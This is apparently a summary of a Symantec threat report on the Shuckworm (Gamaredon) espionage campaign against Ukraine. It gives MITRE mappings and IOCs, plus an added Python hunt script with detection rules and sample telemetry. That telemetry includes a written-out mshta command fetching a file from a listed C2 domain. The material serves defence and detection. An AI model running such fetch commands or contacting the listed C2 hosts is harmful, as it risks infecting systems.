Shuckworm (also known as Gamaredon or Armageddon) is a Russia-linked group that has focused on Ukraine since 2014, conducting espionage and information-stealing campaigns. Symantec’s observations detail the infection chain, malware families, and IOCs tied to a campaign active at least through August 2022, underscoring persistent targeting of Ukrainian networks. Hashtags: #Shuckworm #Gamaredon #Armageddon #Ukraine #Pterodo #Giddome
Key points
- Shuckworm is a Russia-linked threat actor with a long-running focus on Ukraine and is regarded as a state-sponsored espionage group.
- The campaign began with a self-extracting 7-Zip file delivered via email, followed by mshta.exe downloading an XML file masquerading as an HTA.
- The dropper and loaders connect to PowerShell-based stealer tools, with multiple PowerShell variants observed on a single system.
- Two VBScript downloaders (with file names containing “juice” and “justice”) were linked to Backdoor.Pterodo; they are capable of calling PowerShell and communicating with a C2 server.
- Variants of “ntuser” file names (e.g., ntuser.dat.tmcontainer.*) are used, often tied to Giddome backdoor activity, to seed deceptive artifacts such as VCD-, ASC-, and H264-like files.
- The backdoor 4896.exe provides capabilities such as audio capture, screen capture, keystroke logging, and downloading/executing additional payloads.
- Legitimate remote-access tools like Ammyy Admin and AnyDesk were leveraged for persistent remote access, illustrating the use of trusted software for espionage.
MITRE Techniques
- [T1566.001] Phishing – The attackers delivered a self-extracting 7-Zip file via email. “the 7-Zip file seen on victim networks in the campaign observed by Symantec was delivered to victims via email.”
- [T1218.005] Mshta – mshta.exe downloaded an XML file masquerading as an HTA file. “mshta.exe downloaded an XML file, which was likely masquerading as an HTML application (HTA) file.”
- [T1059.001] PowerShell – PowerShell stealer used with multiple variants on a system. “execution of a PowerShell stealer… three versions of the same PowerShell stealer appear on the one system.”
- [T1059.005] VBScript – VBScript downloaders (Backdoor.Pterodo) call PowerShell and interact with C2. “Two VBS downloaders… These scripts are capable of calling PowerShell, uploading screenshots, and also executing code downloaded from a command-and-control (C&C) server.”
- [T1036] Masquerading – Ntuser.* file-name patterns used to sow confusion. “using files that contain ‘ntuser’ in the file names”
- [T1113] Screen Capture – The backdoor takes and uploads screenshots. “Take screenshots and upload them”
- [T1123] Audio Capture – The backdoor records audio via the microphone and uploads it. “Record audio using the microphone and upload the recorded files to a remote location”
- [T1056.001] Keylogging – The malware logs and uploads keystrokes. “Log and upload keystrokes”
- [T1021.001] Remote Services – Attackers used Ammyy Admin and AnyDesk for remote access. “The legitimate remote desktop protocol (RDP) tools Ammyy Admin and AnyDesk were both also leveraged by the attackers for remote access.”
- [T1105] Ingress Tool Transfer – The framework downloads and executes additional payloads (EXEs/DLLs) from C2. “download and execute .exe files or download and load DLL files”
Indicators of Compromise
- [SHA256] Malicious files observed – abb6aab63b29610dbc0a6d634b6777ff0a2a2b61c5f60bd09b0c3aa3919fa00d, 63490fc0828f9683f5dd5799452d684dcc32db28d683943b2bad5b56eee6f03e
- [Host IOCs] Victim-side artifacts – ntuser.dat.tm.declare.exe, jury.mp3
- [Network IOCs] Domains/IPs associated with C2 – destroy.asierdo[.]ru, a0698649.xsph[.]ru, 165.22.215[.]30, 45.63.94[.]49
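As an added, defender-side example that is not part of this summary or of Symantec's report: a small Python hunt that applies the IOCs listed above and the behaviours from the MITRE section (mshta.exe fetching a remote "HTA", ntuser-style file-name masquerading, the remote-access tools) to telemetry events. The event records, their file paths, and the pairing of one event with one of the listed hashes are constructed for illustration; the hashes, host file names and C2 indicators are the page's. Legitimate Windows profiles contain files such as ntuser.dat.LOG1 and ntuser.dat{GUID}.TMContainer*.regtrans-ms, so the ntuser rule only fires on an executable or script extension, or when such a name runs as a process.

```python
"""Hunt for the Shuckworm tradecraft summarized above in sample telemetry.

The events below are constructed for this example; only the hashes,
file names and C2 indicators come from the published IOC list.
"""
import re

# Indicators of compromise from the page (C2 entries are de-fanged there).
IOC_SHA256 = {
    "abb6aab63b29610dbc0a6d634b6777ff0a2a2b61c5f60bd09b0c3aa3919fa00d",
    "63490fc0828f9683f5dd5799452d684dcc32db28d683943b2bad5b56eee6f03e",
}
IOC_FILENAMES = {"ntuser.dat.tm.declare.exe", "jury.mp3"}
IOC_NETWORK = {
    i.replace("[.]", ".")
    for i in ("destroy.asierdo[.]ru", "a0698649.xsph[.]ru",
              "165.22.215[.]30", "45.63.94[.]49")
}

# Behavioural rules (patterns written for this example, not from the report).
URL_RE = re.compile(r"https?://", re.I)
# Real profiles hold ntuser.dat.LOG* and ntuser.dat{GUID}.TMContainer*.regtrans-ms,
# so an ntuser-style name is only suspicious with an executable/script extension.
EXEC_EXT = {"exe", "dll", "scr", "vbs", "vbe", "js", "hta", "ps1", "bat", "cmd"}
NTUSER_RE = re.compile(r"^ntuser\.dat\.tm", re.I)
RAT_RE = re.compile(r"(anydesk|ammyy)", re.I)


def basename(path):
    """Last path component, accepting both Windows and POSIX separators."""
    return re.split(r"[\\/]", path)[-1]


def check_event(ev):
    """Return the names of every rule the event trips (empty list if none)."""
    hits = []
    sha = ev.get("sha256", "").lower()
    if ev["type"] == "process":
        image = basename(ev["image"]).lower()
        cmd = ev.get("cmdline", "")
        if image == "mshta.exe" and URL_RE.search(cmd):   # T1218.005
            hits.append("mshta_remote_payload")
        if RAT_RE.search(image):                           # T1021.001
            hits.append("remote_access_tool")
        if NTUSER_RE.match(image):                         # T1036 as a process
            hits.append("ntuser_masquerade_exec")
    elif ev["type"] == "file":
        name = basename(ev["path"]).lower()
        ext = name.rsplit(".", 1)[-1] if "." in name else ""
        if name in IOC_FILENAMES:
            hits.append("ioc_filename")
        if NTUSER_RE.match(name) and ext in EXEC_EXT:      # T1036 on disk
            hits.append("ntuser_masquerade_file")
    elif ev["type"] == "network":
        if ev["dest"].lower() in IOC_NETWORK:
            hits.append("ioc_c2")
    if sha in IOC_SHA256:
        hits.append("ioc_sha256")
    return hits


def hunt(events):
    """Flatten all findings into (event id, rule name) pairs."""
    return [(ev["id"], rule) for ev in events for rule in check_event(ev)]


# Constructed sample telemetry: a mix of campaign-like and benign events.
SAMPLE_EVENTS = [
    {"id": "e1", "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://a0698649.xsph.ru/index.xml"},
    {"id": "e2", "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\user\Documents\help.hta"},       # local, benign
    {"id": "e3", "type": "file",
     "path": r"C:\Users\user\AppData\Roaming\ntuser.dat.tmcontainer.exe"},
    {"id": "e4", "type": "file",                                         # legitimate
     "path": r"C:\Users\user\ntuser.dat{GUID}.TMContainer00000000000000000001.regtrans-ms"},
    {"id": "e5", "type": "file", "path": r"C:\Users\user\Music\jury.mp3"},
    {"id": "e6", "type": "process", "image": r"C:\Users\user\ntuser.dat.tm.declare.exe"},
    {"id": "e7", "type": "network", "dest": "165.22.215.30"},
    {"id": "e8", "type": "process", "image": r"C:\Users\user\Downloads\AnyDesk.exe"},
    {"id": "e9", "type": "file", "path": r"C:\Users\user\Temp\stage2.bin",  # name constructed
     "sha256": "abb6aab63b29610dbc0a6d634b6777ff0a2a2b61c5f60bd09b0c3aa3919fa00d"},
]

if __name__ == "__main__":
    for event_id, rule in hunt(SAMPLE_EVENTS):
        print(event_id, rule)
```

The remote-access-tool hit is a review item rather than a verdict: AnyDesk and Ammyy Admin are legitimate, so the finding should be checked against what is authorized in the environment, and hash matches should be paired with the behavioural hits, since the hashes cover only the samples Symantec published.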
Read more: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm